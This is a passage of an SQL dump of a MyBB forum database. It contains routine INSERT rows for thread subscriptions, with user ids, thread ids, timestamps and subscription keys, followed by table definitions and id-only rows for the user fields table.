('38', '82', '182', '1', '1345647134', '7365e664cb84f34030b5cb54662987bd'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('39', '82', '185', '1', '1345689206', '6e3a873d989299a8fb9b3e31c42aea2e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('40', '82', '189', '1', '1345730037', '7dcabb72b1719cc4169848cf458de22c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('41', '82', '179', '1', '1345730342', '089fa11759a5b39ab2319e399f5b84ea'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('42', '82', '187', '1', '1345730390', 'beb512dc4fb6ef3407d382fadffe8564'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('43', '82', '184', '1', '1345730483', 'cef8adfcae75014fa027eae5f890a9f3'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('44', '82', '192', '1', '1345749254', '88df23b1a057b4168d0d3f7d85825306'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('45', '82', '190', '1', '1345749300', '9383fa74161aa0fc3d462cfa4377bbb9'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('46', '82', '188', '1', '1345749631', 'e9418a247555897b88706b874950d5de'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('47', '82', '81', '1', '1345750602', 'c147e590a364d0d0087e41d6f85fb6fa'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('48', '82', '94', '1', '1345751596', 'b35839ac5c351fb0e0da6f2306bfb3f4'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('49', '82', '39', '1', '1345751702', 'a8f8bc5ad9559e190081256d78310ecd'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('50', '82', '26', '1', '1345752102', '68c80e1510dc9fec641db40579a0d508'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('51', '82', '193', '1', '1345752929', '9636b66d4df0623f56cd78c5c854e581'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('52', '82', '130', '1', '1345753707', '301999ed910ea0bb3abb44fbd5490eb8'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('53', '82', '195', '1', '1345759118', '5e1c59f356cee1c0fd4fa14264ebdfc2'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('54', '82', '196', '1', '1345766360', '0299b576751bb4f21cdaeee717baa2d3'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('55', '82', '197', '1', '1345766578', 'b65bcfaaf599f5d9cc280310208948b0'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('56', '82', '200', '1', '1345776608', 'c497c960189ef3ceb8510e15a3691f06'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('57', '82', '203', '1', '1345814261', '55e6b87dd8cdecdea162dba13ba4a2b2'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('58', '82', '201', '1', '1345814819', 'cce1904b52d2705050e7446f8efc6a8f'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('59', '82', '78', '1', '1345820653', '0e76d38a4c9275e9b509209fd9ce0087'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('60', '82', '206', '1', '1345824220', 'c161f8b049c054ff0bced99b8e60c652'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('61', '82', '207', '1', '1345827486', 'd964b87d731ef4379d474c6e56a7cdfb'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('62', '82', '208', '1', '1345836146', '85c57c61965753be3f463f7b426b717a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('63', '82', '209', '1', '1345848449', '22ebfd0f015fab31656640e6362017de'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('64', '82', '210', '1', '1345853611', '412b3af74c3a123e07c1b999aedeb0eb'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('65', '82', '211', '1', '1345857526', '377cf8bdde8f9f976b7d6238ec064188'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('66', '82', '176', '1', '1345867236', '56983d8508c5e7b2297d36db1298069e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('67', '82', '213', '1', '1345867692', '1b4266535c92df48b47b7f1ad9893900'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('68', '82', '24', '1', '1345868955', '83b355b02809b918335d2f29c0af2d8c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('69', '82', '218', '1', '1345869611', 'db5b85b6bebe1976759f15770ee361ab'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('70', '82', '219', '1', '1345871321', '6a29b7860f211fe8f96be2746af21996'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('71', '82', '221', '1', '1345903215', '7f4c538e30dc20a51abcab7e1540f01c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('72', '82', '222', '1', '1345905811', '01dcbd3b49a69d2c5840c3420f495739'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('73', '82', '223', '1', '1345906030', '5c5867d80f37e99f5f038caa21610601'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('74', '82', '224', '1', '1345906134', '3759e04b4a0515df5616403806e759c3'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('96', '48', '113', '0', '1345984968', 'b0161e536590ef534860011a88e47eb5'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('76', '48', '130', '0', '1345909041', '3745118c91960f6e27e722177097b2e2'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('77', '82', '230', '1', '1345917879', 'b777e456fb72dc5b1e51bac5d6179e35'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('78', '82', '212', '1', '1345918349', 'e1174a4c88d7db908b2d27c670493c51'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('79', '82', '231', '1', '1345918976', '48b0df5cacb6d3190e1a1c1fab8b0b55'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('80', '82', '233', '1', '1345948629', '3dba147e31982a5278f2b3c9b7d8f660'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('81', '82', '29', '1', '1345949449', 'fa2201975cc48ceb49cedaa66bf956f0'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('82', '82', '226', '1', '1345949816', '54df3c541a70e8a7d1a2b306159836a3'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('83', '82', '232', '1', '1345950447', 'a1b96fc86db008070888931d880bce5b'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('84', '82', '236', '1', '1345951020', '74ba028343c322c8d64cfdef4da19ed5'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('85', '82', '214', '1', '1345951240', 'f6f25b65872bff0b7eab07c363a13f7a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('86', '82', '235', '1', '1345951506', 'c709f63d79cdf997c115ce0b3ad78a65'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('87', '82', '237', '1', '1345952107', '4671c7b1dea6e28e744b69c1392e6a5b'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('88', '82', '238', '1', '1345953707', '7c7dcc0ff06654c5a556f7eb193f5b9e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('89', '82', '239', '1', '1345954747', '4e4d01939aa075d66ef7e9253b3465ca'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('90', '82', '240', '1', '1345957663', 'de1c70649412fa93160f835a1b14af47'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('91', '82', '241', '1', '1345958174', 'a9233cbcab92dfd38c6add6f4cd77b44'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('92', '82', '242', '1', '1345959364', '627ad717f0eac9d3a73a1ca3ce21c057'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('93', '82', '243', '1', '1345959485', 'bfdded03d0f68a26c245d5b6c1b36918'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('94', '82', '244', '1', '1345961374', 'e2f43b7c08c983393649b8714895850e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('95', '48', '246', '0', '1345978650', '29a325a3162020899ebc0c86f35e3d76'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('98', '82', '247', '1', '1345991171', '125273c9c4977b5ae209c00af2af15db'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('99', '82', '248', '1', '1345991325', '9f11f9b7f51f018dadbfe00ad07972b6'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('100', '82', '249', '1', '1345991527', 'ff65bcb0076fa73194f41e75a83d9f28'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('101', '82', '250', '1', '1345994060', '16090a89fd151effdf2ac6209c069208'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('102', '82', '191', '1', '1346079186', 'e46c0b084395c0bfb0a5b2a38c5df582'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('103', '82', '253', '1', '1346079894', 'e6a661cb86a09039f583f5977acc93aa'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('104', '82', '256', '1', '1346082742', '84630b0294ca9f9fe9521df53b62f5e4'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('105', '82', '257', '1', '1346084981', '354d925b8efd8590cf3f9b9e4508d242'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('106', '82', '259', '1', '1346093539', '6eeed92fdf92d74c08e69dd711f05bea'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('107', '82', '260', '1', '1346095927', '159f19c1b9274fbe928a0c4ad32e714f'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('108', '82', '261', '1', '1346096034', 'a4b96191250fdefe476b7855f69b6965'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('109', '82', '159', '1', '1346096562', '3dc99809a2d951e87e2401adf0422665'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('111', '82', '265', '1', '1346110374', 'ecb6c4d64821d75bff2897eb08c81f34'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('112', '82', '266', '1', '1346111714', '08634915011b8a587b3d70754f5fe33e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('113', '82', '267', '1', '1346113934', '2614f9ed96989a6422365e5f0ad3107e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('114', '82', '268', '1', '1346114870', '48bdcb718cb0fb2c03108a3cef4454bf'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('115', '82', '269', '1', '1346130233', 'b0c55da911163d6a38b956b869dada2b'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('116', '82', '270', '1', '1346160715', 'e993d649699fd1dc2b260e026704e3c4'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('117', '82', '271', '1', '1346163123', 'de2707136391bc56c902b837b4605584'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('118', '82', '262', '1', '1346163204', 'd02222292df545c628b071598384045a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('119', '82', '272', '1', '1346169725', '8d826319d2271c6a9dd8e9f821c8c1fb'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('120', '82', '276', '1', '1346203064', 'b7b12187dc14a3e1af1a0080817ddbb5'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('121', '82', '275', '1', '1346210074', '5fb43ef6d2ac9a18952f969f8a5538bf'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('122', '82', '273', '1', '1346210928', 'd4b2b7f4299458cf12583f28bbe9290a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('123', '82', '278', '1', '1346252666', '993f94ffcc2b897b54311213c8ad7277'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('124', '82', '279', '1', '1346256050', '92b39e0bede6b5b67dd0090c75980e9f'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('126', '82', '282', '1', '1346287917', 'e65309187708cead35303ccf86969747'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('127', '82', '286', '1', '1346288091', 'de859cb7726cd15d6005fcf60ba589e5'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('128', '48', '141', '0', '1346342033', '1b8e07ea56f0ec46316fad7fc3500812'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('129', '82', '281', '1', '1346348557', 'cd96e837cc52f253a54ca31af7718615'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('130', '82', '284', '1', '1346350445', 'd83732325c419ecca8367ff10a6e9d32'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('133', '154', '234', '1', '1347177981', '077376a144ed17f54677b07f44964f51'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('134', '159', '298', '0', '1347329497', '70daae69856c14f46b1425873d51a922'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('135', '200', '536', '1', '1348794230', '2b13adcc93b297a99eb5129d4a5c3c9c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('136', '200', '526', '1', '1348794406', 'b4a2ce2721460f505337e04be48216dd'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('137', '200', '529', '1', '1348794616', '91e970494dbb60fa80dc8e5661ce5419'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('138', '200', '439', '1', '1348794685', '80fdd3ab4a01e74175dc067add476b19'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('139', '200', '494', '1', '1348794760', '9dcd1395e589ca8c5f3002da6523a6dc'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('140', '200', '528', '1', '1348794793', '50b8e51a189fdd9d96f2c4fb4778424c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('141', '200', '514', '1', '1348794835', 'de349bb00089a9aa47c2472f5f7bd8b9'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('142', '200', '518', '1', '1348794870', 'ed51e9b1dfcf4347466b2484c1f1fd0a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('143', '200', '493', '1', '1348794997', 'b023d7168db64fef9176652074eed2e8'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('144', '200', '449', '1', '1348795062', '959b667c0c5d1956e4d09a88243a350b'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('145', '200', '390', '1', '1348795092', '728e732794c98c208c9e16faacafc026'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('146', '200', '257', '1', '1348795124', 'bee22fac52d2d5703f03e509eccddef8'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('147', '200', '209', '1', '1348797830', '13ed8b79e5e5fe8642f497281633820e'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('148', '228', '807', '1', '1349957220', '1e1b7584b114bb5f9a605f4f3fa44eeb'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('149', '228', '822', '1', '1350029946', '1f9009202e9820f536d0cc863ac7e8ec'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('150', '257', '848', '1', '1350120079', 'f4bf4616efafcef81275a40c6b3fd25c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('151', '257', '845', '1', '1350120159', 'a5ad50354fe068aa50555c89a4dff62c'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('152', '257', '865', '1', '1350261994', '8966933f5ab1b24c66becdc4046ffabf'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('153', '228', '891', '1', '1350393266', 'db51993915fe4cc59a28265075fbf67a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('154', '228', '892', '1', '1350393859', '52860c7ba14e4547fb38f811d771ca37'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('155', '228', '900', '1', '1350424596', '4fffc982d5ee2f098e3bf1239cd8930f'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('157', '228', '957', '1', '1350593317', 'cd7c25279e6c7f44f3a565eb68c3d95a'); INSERT INTO `mybb_threadsubscriptions` (`sid`, `uid`, `tid`, `notification`, `dateline`, `subscriptionkey`) VALUES ('160', '100', '398', '1', '1352517221', 'cb430f85a6e3abd620618543020ff33a'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_threadviews`; CREATE TABLE `mybb_threadviews` ( `tid` int(10) unsigned NOT NULL DEFAULT '0', KEY `tid` (`tid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_threadviews` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_userfields`; CREATE TABLE `mybb_userfields` ( `ufid` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`ufid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_userfields` WRITE; INSERT INTO `mybb_userfields` (`ufid`) VALUES ('2'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('3'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('4'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('5'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('6'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('7'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('8'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('9'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('10'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('11'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('12'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('13'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('14'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('16'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('17'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('18'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('19'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('20'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('21'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('23'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('24'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('25'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('26'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('27'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('29'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('31'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('33'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('34'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('36'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('39'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('42'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('43'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('44'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('45'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('48'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('50'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('51'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('52'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('53'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('54'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('55'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('56'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('57'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('60'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('61'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('62'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('63'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('64'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('65'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('66'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('67'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('68'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('69'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('70'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('71'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('72'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('80'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('82'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('84'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('86'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('87'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('89'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('90'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('91'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('97'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('100'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('101'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('107'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('108'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('109'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('110'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('111'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('112'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('113'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('114'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('115'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('116'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('117'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('119'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('120'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('121'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('122'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('123'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('124'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('125'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('126'); INSERT INTO `mybb_userfields` 